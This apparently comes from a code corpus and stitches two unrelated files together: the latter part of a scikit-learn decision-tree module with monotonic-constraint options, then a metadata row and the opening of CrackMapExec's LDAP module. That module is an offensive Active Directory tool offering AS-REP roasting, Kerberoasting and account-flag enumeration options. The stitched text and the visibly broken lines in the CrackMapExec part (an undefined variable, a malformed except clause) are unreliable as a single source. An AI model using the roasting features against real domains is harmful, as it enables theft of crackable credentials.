classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
X_idx_sorted : array-like, shape = [n_samples, n_features], optional
The indexes of the sorted training input samples. If many tree
are grown on the same dataset, this allows the ordering to be
cached between trees. If None, the data will be sorted here.
Don't use this parameter unless you know what to do.
Returns
-------
self : object
Returns self.
"""
random_state = check_random_state(self.random_state)
if check_input:
X = check_array(X, dtype=DTYPE, accept_sparse="csc")
y = check_array(y, ensure_2d=False, dtype=None)
if issparse(X):
X.sort_indices()
if X.indices.dtype != np.intc or X.indptr.dtype != np.intc:
raise ValueError("No support for np.int64 index based "
"sparse matrices")
# Determine output settings
n_samples, self.n_features_ = X.shape
is_classification = isinstance(self, ClassifierMixin)
y = np.atleast_1d(y)
expanded_class_weight = None
if y.ndim == 1:
# reshape is necessary to preserve the data contiguity against vs
# [:, np.newaxis] that does not.
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
if is_classification:
check_classification_targets(y)
y = np.copy(y)
self.classes_ = []
self.n_classes_ = []
if self.class_weight is not None:
y_original = np.copy(y)
y_encoded = np.zeros(y.shape, dtype=np.int)
for k in range(self.n_outputs_):
classes_k, y_encoded[:, k] = np.unique(y[:, k],
return_inverse=True)
self.classes_.append(classes_k)
self.n_classes_.append(classes_k.shape[0])
y = y_encoded
if self.class_weight is not None:
expanded_class_weight = compute_sample_weight(
self.class_weight, y_original)
else:
self.classes_ = [None] * self.n_outputs_
self.n_classes_ = [1] * self.n_outputs_
self.n_classes_ = np.array(self.n_classes_, dtype=np.intp)
if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous:
y = np.ascontiguousarray(y, dtype=DOUBLE)
# Check parameters
max_depth = ((2 ** 31) - 1 if self.max_depth is None
else self.max_depth)
max_leaf_nodes = (-1 if self.max_leaf_nodes is None
else self.max_leaf_nodes)
if isinstance(self.min_samples_leaf, (numbers.Integral, np.integer)):
min_samples_leaf = self.min_samples_leaf
else: # float
min_samples_leaf = int(ceil(self.min_samples_leaf * n_samples))
if isinstance(self.min_samples_split, (numbers.Integral, np.integer)):
min_samples_split = self.min_samples_split
else: # float
min_samples_split = int(ceil(self.min_samples_split * n_samples))
min_samples_split = max(2, min_samples_split)
min_samples_split = max(min_samples_split, 2 * min_samples_leaf)
if isinstance(self.max_features, six.string_types):
if self.max_features == "auto":
if is_classification:
max_features = max(1, int(np.sqrt(self.n_features_)))
else:
max_features = self.n_features_
elif self.max_features == "sqrt":
max_features = max(1, int(np.sqrt(self.n_features_)))
elif self.max_features == "log2":
max_features = max(1, int(np.log2(self.n_features_)))
else:
raise ValueError(
'Invalid value for max_features. Allowed string '
'values are "auto", "sqrt" or "log2".')
elif self.max_features is None:
max_features = self.n_features_
elif isinstance(self.max_features, (numbers.Integral, np.integer)):
max_features = self.max_features
else: # float
if self.max_features > 0.0:
max_features = max(1,
int(self.max_features * self.n_features_))
else:
max_features = 0
self.max_features_ = max_features
if len(y) != n_samples:
raise ValueError("Number of labels=%d does not match "
"number of samples=%d" % (len(y), n_samples))
if not (0. < self.min_samples_split <= 1. or
2 <= self.min_samples_split):
raise ValueError("min_samples_split must be in at least 2"
" or in (0, 1], got %s" % min_samples_split)
if not (0. < self.min_samples_leaf <= 0.5 or
1 <= self.min_samples_leaf):
raise ValueError("min_samples_leaf must be at least than 1 "
"or in (0, 0.5], got %s" % min_samples_leaf)
if not 0 <= self.min_weight_fraction_leaf <= 0.5:
raise ValueError("min_weight_fraction_leaf must in [0, 0.5]")
if max_depth <= 0:
raise ValueError("max_depth must be greater than zero. ")
if not (0 < max_features <= self.n_features_):
raise ValueError("max_features must be in (0, n_features]")
if not isinstance(max_leaf_nodes, (numbers.Integral, np.integer)):
raise ValueError("max_leaf_nodes must be integral number but was "
"%r" % max_leaf_nodes)
if -1 < max_leaf_nodes < 2:
raise ValueError(("max_leaf_nodes {0} must be either smaller than "
"0 or larger than 1").format(max_leaf_nodes))
if sample_weight is not None:
if (getattr(sample_weight, "dtype", None) != DOUBLE or
not sample_weight.flags.contiguous):
sample_weight = np.ascontiguousarray(
sample_weight, dtype=DOUBLE)
if len(sample_weight.shape) > 1:
raise ValueError("Sample weights array has more "
"than one dimension: %d" %
len(sample_weight.shape))
if len(sample_weight) != n_samples:
raise ValueError("Number of weights=%d does not match "
"number of samples=%d" %
(len(sample_weight), n_samples))
if expanded_class_weight is not None:
if sample_weight is not None:
sample_weight = sample_weight * expanded_class_weight
else:
sample_weight = expanded_class_weight
# Set min_weight_leaf from min_weight_fraction_leaf
if self.min_weight_fraction_leaf != 0. and sample_weight is not None:
min_weight_leaf = (self.min_weight_fraction_leaf *
np.sum(sample_weight))
else:
min_weight_leaf = 0.
if self.min_impurity_split < 0.:
raise ValueError("min_impurity_split must be greater than or equal "
"to 0")
presort = self.presort
# Allow presort to be 'auto', which means True if the dataset is dense,
# otherwise it will be False.
if self.presort == 'auto' and issparse(X):
presort = False
elif self.presort == 'auto':
presort = True
if presort is True and issparse(X):
raise ValueError("Presorting is not supported for sparse "
"matrices.")
# If multiple trees are built on the same dataset, we only want to
# presort once. Splitters now can accept presorted indices if desired,
# but do not handle any presorting themselves. Ensemble algorithms
# which desire presorting must do presorting themselves and pass that
# matrix into each tree.
if X_idx_sorted is None and presort:
X_idx_sorted = np.asfortranarray(np.argsort(X, axis=0),
dtype=np.int32)
if presort and X_idx_sorted.shape != X.shape:
raise ValueError("The shape of X (X.shape = {}) doesn't match "
"the shape of X_idx_sorted (X_idx_sorted"
".shape = {})".format(X.shape,
X_idx_sorted.shape))
# Build tree
criterion = self.criterion
if not isinstance(criterion, Criterion):
if is_classification:
criterion = CRITERIA_CLF[self.criterion](self.n_outputs_,
self.n_classes_)
else:
criterion = CRITERIA_REG[self.criterion](self.n_outputs_,
n_samples)
SPLITTERS = SPARSE_SPLITTERS if issparse(X) else DENSE_SPLITTERS
def _encode_monotonic(increasing, decreasing):
if increasing is None: increasing = []
if decreasing is None: decreasing = []
def is_int_in_range(feature):
return isinstance(feature, int) and 0 <= feature < self.n_features_
def is_valid(features):
return (isinstance(features, list) and
all(is_int_in_range(feature) for feature in features))
if not is_valid(increasing):
raise ValueError("increasing should be a list of ints in the range [0,n_features].")
if not is_valid(decreasing):
raise ValueError("decreasing should be a list of ints in the range [0,n_features].")
if increasing and decreasing:
intersection = set(increasing) & set(decreasing)
if intersection:
raise ValueError("The following features cannot be both increasing and decreasing: " + str(list(intersection)))
monotonic = np.zeros(self.n_features_, dtype=np.int32)
if increasing:
for feature in increasing:
monotonic[feature] = 1
if decreasing:
for feature in decreasing:
monotonic[feature] = -1
return monotonic
monotonic = _encode_monotonic(self.increasing, self.decreasing)
splitter = self.splitter
if not isinstance(self.splitter, Splitter):
splitter = SPLITTERS[self.splitter](criterion,
self.max_features_,
min_samples_leaf,
min_weight_leaf,
random_state,
self.presort,
monotonic)
self.tree_ = Tree(self.n_features_, self.n_classes_, self.n_outputs_)
# Use BestFirst if max_leaf_nodes given; use DepthFirst otherwise
if max_leaf_nodes < 0:
builder = DepthFirstTreeBuilder(splitter, min_samples_split,
min_samples_leaf,
min_weight_leaf,
max_depth, self.min_impurity_split)
else:
builder = BestFirstTreeBuilder(splitter, min_samples_split,
min_samples_leaf,
min_weight_leaf,
max_depth,
max_leaf_nodes, self.min_impurity_split)
builder.build(self.tree_, X, y, sample_weight, X_idx_sorted)
if self.n_outputs_ == 1:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
return self
def _validate_X_predict(self, X, check_input):
"""Validate X whenever one tries to predict, apply, predict_proba"""
if self.tree_ is None:
raise NotFittedError("Estimator not fitted, "
"call `fit` before exploiting the model.")
if check_input:
X = check_array(X, dtype=DTYPE, accept_sparse="csr")
if issparse(X) and (X.indices.dtype != np.intc or
X.indptr.dtype != np.intc):
raise ValueError("No support for np.int64 index based "
"sparse matrices")
n_features = X.shape[1]
if self.n_features_ != n_features:
raise ValueError("Number of features of the model must "
"match the input. Model n_features is %s and "
"input n_features is %s "
% (self.n_features_, n_features))
return X
def predict(self, X, check_input=True):
"""Predict class or regression value for X.
For a classification model, the predicted class for each sample in X is
returned. For a regression model, the predicted value based on X is
returned.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Returns
-------
y : array of shape = [n_samples] or [n_samples, n_outputs]
The predicted classes, or the predict values.
"""
X = self._validate_X_predict(X, check_input)
proba = self.tree_.predict(X)
n_samples = X.shape[0]
# Classification
if isinstance(self, ClassifierMixin):
if self.n_outputs_ == 1:
return self.classes_.take(np.argmax(proba, axis=1), axis=0)
else:
predictions = np.zeros((n_samples, self.n_outputs_))
for k in range(self.n_outputs_):
predictions[:, k] = self.classes_[k].take(
np.argmax(proba[:, k], axis=1),
axis=0)
return predictions
# Regression
else:
if self.n_outputs_ == 1:
return proba[:, 0]
else:
return proba[:, :, 0]
def apply(self, X, check_input=True):
"""
Returns the index of the leaf that each sample is predicted as.
.. versionadded:: 0.17
Parameters
----------
X : array_like or sparse matrix, shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Returns
-------
X_leaves : array_like, shape = [n_samples,]
For each datapoint x in X, return the index of the leaf x
ends up in. Leaves are numbered within
``[0; self.tree_.node_count)``, possibly with gaps in the
numbering.
"""
X = self._validate_X_predict(X, check_input)
return self.tree_.apply(X)
def decision_path(self, X, check_input=True):
"""Return the decision path in the tree
Parameters
----------
X : array_like or sparse matrix, shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Returns
-------
indicator : sparse csr array, shape = [n_samples, n_nodes]
Return a node indicator matrix where non zero elements
indicates that the samples goes through the nodes.
"""
X = self._validate_X_predict(X, check_input)
return self.tree_.decision_path(X)
@property
def feature_importances_(self):
"""Return the feature importances.
The importance of a feature is computed as the (normalized) total
reduction of the criterion brought by that feature.
It is also known as the Gini importance.
Returns
-------
feature_importances_ : array, shape = [n_features]
"""
if self.tree_ is None:
raise NotFittedError("Estimator not fitted, call `fit` before"
" `feature_importances_`.")
return self.tree_.compute_feature_importances()
# =============================================================================
# Public estimators
# =============================================================================
class DecisionTreeClassifier(BaseDecisionTree, ClassifierMixin):
"""A decision tree classifier.
Read more in the :ref:`User Guide <tree>`.
Parameters
----------
criterion : string, optional (default="gini")
The function to measure the quality of a split. Supported criteria are
"gini" for the Gini impurity and "entropy" for the information gain.
splitter : string, optional (default="best")
The strategy used to choose the split at each node. Supported
strategies are "best" to choose the best split and "random" to choose
the best random split.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_depth : int or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int, float, optional (default=2)
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a percentage and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
min_samples_leaf : int, float, optional (default=1)
The minimum number of samples required to be at a leaf node:
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a percentage and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
max_leaf_nodes : int or None, optional (default=None)
Grow a tree with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
class_weight : dict, list of dicts, "balanced" or None, optional (default=None)
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
For multi-output, the weights of each column of y will be multiplied.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
min_impurity_split : float, optional (default=1e-7)
Threshold for early stopping in tree growth. A node will split
if its impurity is above the threshold, otherwise it is a leaf.
.. versionadded:: 0.18
presort : bool, optional (default=False)
Whether to presort the data to speed up the finding of best splits in
fitting. For the default settings of a decision tree on large
datasets, setting this to true may slow down the training process.
When using either a smaller dataset or a restricted depth, this may
speed up the training.
increasing : list of ints, optional (default=None)
Indices of features to have a monotonically increasing effect.
decreasing : list of ints, optional (default=None)
Indices of features to have a monotonically decreasing effect.
Attributes
----------
classes_ : array of shape = [n_classes] or a list of such arrays
The classes labels (single output problem),
or a list of arrays of class labels (multi-output problem).
feature_importances_ : array of shape = [n_features]
The feature importances. The higher, the more important the
feature. The importance of a feature is computed as the (normalized)
total reduction of the criterion brought by that feature. It is also
known as the Gini importance [4]_.
max_features_ : int,
The inferred value of max_features.
n_classes_ : int or list
The number of classes (for single output problems),
or a list containing the number of classes for each
output (for multi-output problems).
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
tree_ : Tree object
The underlying Tree object.
See also
--------
DecisionTreeRegressor
References
----------
.. [1] https://en.wikipedia.org/wiki/Decision_tree_learning
.. [2] L. Breiman, J. Friedman, R. Olshen, and C. Stone, "Classification
and Regression Trees", Wadsworth, Belmont, CA, 1984.
.. [3] T. Hastie, R. Tibshirani and J. Friedman. "Elements of Statistical
Learning", Springer, 2009.
.. [4] L. Breiman, and A. Cutler, "Random Forests",
http://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm
Examples
--------
>>> from sklearn.datasets import load_iris
>>> from sklearn.model_selection import cross_val_score
>>> from sklearn.tree import DecisionTreeClassifier
>>> clf = DecisionTreeClassifier(random_state=0)
>>> iris = load_iris()
>>> cross_val_score(clf, iris.data, iris.target, cv=10)
... # doctest: +SKIP
...
array([ 1. , 0.93..., 0.86..., 0.93..., 0.93...,
0.93..., 0.93..., 1. , 0.93..., 1. ])
"""
def __init__(self,
criterion="gini",
splitter="best",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features=None,
random_state=None,
max_leaf_nodes=None,
min_impurity_split=1e-7,
class_weight=None,
presort=False,
increasing=None,
decreasing=None):
super(DecisionTreeClassifier, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
class_weight=class_weight,
random_state=random_state,
min_impurity_split=min_impurity_split,
presort=presort,
increasing=increasing,
decreasing=decreasing)
def predict_proba(self, X, check_input=True):
"""Predict class probabilities of the input samples X.
The predicted class probability is the fraction of samples of the same
class in a leaf.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
X = self._validate_X_predict(X, check_input)
proba = self.tree_.predict(X)
if self.n_outputs_ == 1:
proba = proba[:, :self.n_classes_]
normalizer = proba.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba /= normalizer
return proba
else:
all_proba = []
for k in range(self.n_outputs_):
proba_k = proba[:, k, :self.n_classes_[k]]
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
all_proba.append(proba_k)
return all_proba
def predict_log_proba(self, X):
"""Predict class log-probabilities of the input samples X.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class log-probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
for k in range(self.n_outputs_):
proba[k] = np.log(proba[k])
return proba
class DecisionTreeRegressor(BaseDecisionTree, RegressorMixin):
"""A decision tree regressor.
Read more in the :ref:`User Guide <tree>`.
Parameters
----------
criterion : string, optional (default="mse")
The function to measure the quality of a split. Supported criteria
are "mse" for the mean squared error, which is equal to variance
reduction as feature selection criterion, and "mae" for the mean
absolute error.
.. versionadded:: 0.18
Mean Absolute Error (MAE) criterion.
splitter : string, optional (default="best")
The strategy used to choose the split at each node. Supported
strategies are "best" to choose the best split and "random" to choose
the best random split.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_depth : int or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int, float, optional (default=2)
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a percentage and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
min_samples_leaf : int, float, optional (default=1)
The minimum number of samples required to be at a leaf node:
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a percentage and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
max_leaf_nodes : int or None, optional (default=None)
Grow a tree with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
min_impurity_split : float, optional (default=1e-7)
Threshold for early stopping in tree growth. If the impurity
of a node is below the threshold, the node is a leaf.
.. versionadded:: 0.18
presort : bool, optional (default=False)
Whether to presort the data to speed up the finding of best splits in
fitting. For the default settings of a decision tree on large
datasets, setting this to true may slow down the training process.
When using either a smaller dataset or a restricted depth, this may
speed up the training.
increasing : list of ints, optional (default=None)
Indices of features to have a monotonically increasing effect.
decreasing : list of ints, optional (default=None)
Indices of features to have a monotonically decreasing effect.
Attributes
----------
feature_importances_ : array of shape = [n_features]
The feature importances.
The higher, the more important the feature.
The importance of a feature is computed as the
(normalized) total reduction of the criterion brought
by that feature. It is also known as the Gini importance [4]_.
max_features_ : int,
The inferred value of max_features.
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
tree_ : Tree object
The underlying Tree object.
See also
--------
DecisionTreeClassifier
References
----------
.. [1] https://en.wikipedia.org/wiki/Decision_tree_learning
.. [2] L. Breiman, J. Friedman, R. Olshen, and C. Stone, "Classification
and Regression Trees", Wadsworth, Belmont, CA, 1984.
.. [3] T. Hastie, R. Tibshirani and J. Friedman. "Elements of Statistical
Learning", Springer, 2009.
.. [4] L. Breiman, and A. Cutler, "Random Forests",
http://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm
Examples
--------
>>> from sklearn.datasets import load_boston
>>> from sklearn.model_selection import cross_val_score
>>> from sklearn.tree import DecisionTreeRegressor
>>> boston = load_boston()
>>> regressor = DecisionTreeRegressor(random_state=0)
>>> cross_val_score(regressor, boston.data, boston.target, cv=10)
... # doctest: +SKIP
...
array([ 0.61..., 0.57..., -0.34..., 0.41..., 0.75...,
0.07..., 0.29..., 0.33..., -1.42..., -1.77...])
"""
def __init__(self,
criterion="mse",
splitter="best",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features=None,
random_state=None,
max_leaf_nodes=None,
min_impurity_split=1e-7,
presort=False,
increasing=None,
decreasing=None):
super(DecisionTreeRegressor, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
random_state=random_state,
min_impurity_split=min_impurity_split,
presort=presort,
increasing=increasing,
decreasing=decreasing)
class ExtraTreeClassifier(DecisionTreeClassifier):
"""An extremely randomized tree classifier.
Extra-trees differ from classic decision trees in the way they are built.
When looking for the best split to separate the samples of a node into two
groups, random splits are drawn for each of the `max_features` randomly
selected features and the best split among those is chosen. When
`max_features` is set 1, this amounts to building a totally random
decision tree.
Warning: Extra-trees should only be used within ensemble methods.
Read more in the :ref:`User Guide <tree>`.
See also
--------
ExtraTreeRegressor, ExtraTreesClassifier, ExtraTreesRegressor
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
"""
def __init__(self,
criterion="gini",
splitter="random",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
random_state=None,
max_leaf_nodes=None,
min_impurity_split=1e-7,
class_weight=None,
increasing=None,
decreasing=None):
super(ExtraTreeClassifier, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
class_weight=class_weight,
min_impurity_split=min_impurity_split,
random_state=random_state,
increasing=increasing,
decreasing=decreasing)
class ExtraTreeRegressor(DecisionTreeRegressor):
"""An extremely randomized tree regressor.
Extra-trees differ from classic decision trees in the way they are built.
When looking for the best split to separate the samples of a node into two
groups, random splits are drawn for each of the `max_features` randomly
selected features and the best split among those is chosen. When
`max_features` is set 1, this amounts to building a totally random
decision tree.
Warning: Extra-trees should only be used within ensemble methods.
Read more in the :ref:`User Guide <tree>`.
See also
--------
ExtraTreeClassifier, ExtraTreesClassifier, ExtraTreesRegressor
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
"""
def __init__(self,
criterion="mse",
splitter="random",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
random_state=None,
min_impurity_split=1e-7,
max_leaf_nodes=None,
increasing=None,
decreasing=None):
super(ExtraTreeRegressor, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
min_impurity_split=min_impurity_split,
random_state=random_state,
increasing=increasing,
decreasing=decreasing)
| bsd-3-clause | -5,421,390,063,791,651,000 | 38.879388 | 143 | 0.572722 | false | 4.31622 | false | false | false |
byt3bl33d3r/CrackMapExec | cme/protocols/ldap.py | 1 | 35043 | # from https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py
# https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
import requests
import logging
import configparser
from cme.connection import *
from cme.helpers.logger import highlight
from cme.logger import CMEAdapter
from cme.protocols.ldap.kerberos import KerberosAttacks
from impacket.smbconnection import SMBConnection, SessionError
from impacket.smb import SMB_DIALECT
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
from impacket.krb5.kerberosv5 import sendReceive, KerberosError, getKerberosTGT, getKerberosTGS
from impacket.krb5.types import KerberosTime, Principal
from impacket.ldap import ldap as ldap_impacket
from impacket.krb5 import constants
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from io import StringIO
class ldap(connection):
def __init__(self, args, db, host):
self.domain = None
self.server_os = None
self.os_arch = 0
self.hash = None
self.ldapConnection = None
self.lmhash = ''
self.nthash = ''
self.baseDN = ''
self.remote_ops = None
self.bootkey = None
self.output_filename = None
self.smbv1 = None
self.signing = False
self.smb_share_name = smb_share_name
self.admin_privs = False
connection.__init__(self, args, db, host)
@staticmethod
def proto_args(parser, std_parser, module_parser):
ldap_parser = parser.add_parser('ldap', help="own stuff using ldap", parents=[std_parser, module_parser])
ldap_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
ldap_parser.add_argument("--no-bruteforce", action='store_true', help='No spray when using file for username and password (user1 => password1, user2 => password2')
ldap_parser.add_argument("--continue-on-success", action='store_true', help="continues authentication attempts even after successes")
ldap_parser.add_argument("--port", type=int, choices={389, 636}, default=389, help="LDAP port (default: 389)")
dgroup = ldap_parser.add_mutually_exclusive_group()
dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, default=None, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')
egroup = ldap_parser.add_argument_group("Retrevie hash on the remote DC", "Options to get hashes from Kerberos")
egroup.add_argument("--asreproast", help="Get AS_REP response ready to crack with hashcat")
egroup.add_argument("--kerberoasting", help='Get TGS ticket ready to crack with hashcat')
vgroup = ldap_parser.add_argument_group("Retrieve useful information on the domain", "Options to to play with Kerberos")
vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1")
vgroup.add_argument("--users", action="store_true", help="Enumerate domain users")
vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")
return parser
def proto_logger(self):
self.logger = CMEAdapter(extra={
'protocol': 'LDAP',
'host': self.host,
'port': self.args.port,
'hostname': self.hostname
})
def get_os_arch(self):
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
if self.args.kerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
except (DCERPCException, e):
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e)))
return 0
def enum_host_info(self):
self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
try:
self.conn.login('' , '')
except:
#if "STATUS_ACCESS_DENIED" in e:
pass
self.domain = self.conn.getServerDNSDomainName()
self.hostname = self.conn.getServerName()
self.server_os = self.conn.getServerOS()
self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']
self.os_arch = self.get_os_arch()
self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
if not self.domain:
self.domain = self.hostname
try:
'''plaintext_login
DC's seem to want us to logoff first, windows workstations sometimes reset the connection
(go home Windows, you're drunk)
'''
self.conn.logoff()
except:
pass
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
#Re-connect since we logged off
self.create_conn_obj()
def print_host_info(self):
self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(self.server_os,
' x{}'.format(self.os_arch) if self.os_arch else '',
self.hostname,
self.domain,
self.signing,
self.smbv1))
def kerberos_login(self, aesKey, kdcHost):
# Create the baseDN
domainParts = self.domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.kdcHost is not None:
target = self.kdcHost
else:
target = self.domain
try:
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
